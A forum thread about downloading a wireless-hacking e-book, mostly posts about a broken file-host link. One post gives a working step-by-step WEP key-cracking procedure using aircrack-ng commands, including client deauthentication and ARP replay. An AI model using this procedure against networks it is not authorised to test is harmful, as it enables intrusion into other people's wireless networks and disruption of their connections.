wireless hacking for dummies e-book

Couldn't download it mate., could have been intersting reading.
thanx for sharing. i'm not into hacking but love to know stuff lol
will ave a gander might find a use for the knowledge
I have not downloaded this file yet but as an aside: I managed to crack my own wep network at long last:

you need: an atheros wlan card, backtrack 2 cd. laptop.

also a wep network with a wep client attached.

Therse commands were used:

note eth0 was the card in this instance, sometimes its wifi0 etc...

iwconfig eth0 mode monitor


now open a few terminal windows eg 1. 2. 3. 4

1. airodump-ng -w test.dmp -i eth0 --channel 7 (last bit optional to narrow the channel - of te AP)

2. aireplay-ng -0 10 -a 00:0f:44:44:44 (AP mac) -c 00:00:00 (mac of client) eth0

(do this one shortly after the previous one as it has to cap the arp packets)

3. aireplay-ng -3 -x 512 -b 00:00:000:00 (AP mac) -h 00:00:000(client mac) eth0

4. aircrack-ng test.dmp-01.ivs

After 200k packets I ran aircrack and it took 1 min to crack the key.

Note if aireplay doesnt see any arp packets you possibly have a useless wlan card. I tried 5 cards before I found one that worked and unfortunately I cant identify exact model
can anyone upload elswere please i only get invalid/expierd key message from that link after waiting for 60 sec each time
dont click the download button. copy and paste the link under it. then when the page reloads click the download button.
tryd that m8 still no luck will try again

ok tryed again first time i copied the link highlited what was in the addy bar and pasted over but it did not work again

second time i manualy deleted all that was in the addy bar befor pasting , after the paste it reloaded page to count down timer and download button worked .... wow wat a **** about hope its worth it,
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same ere just asks for a password, shame really would have made a good read.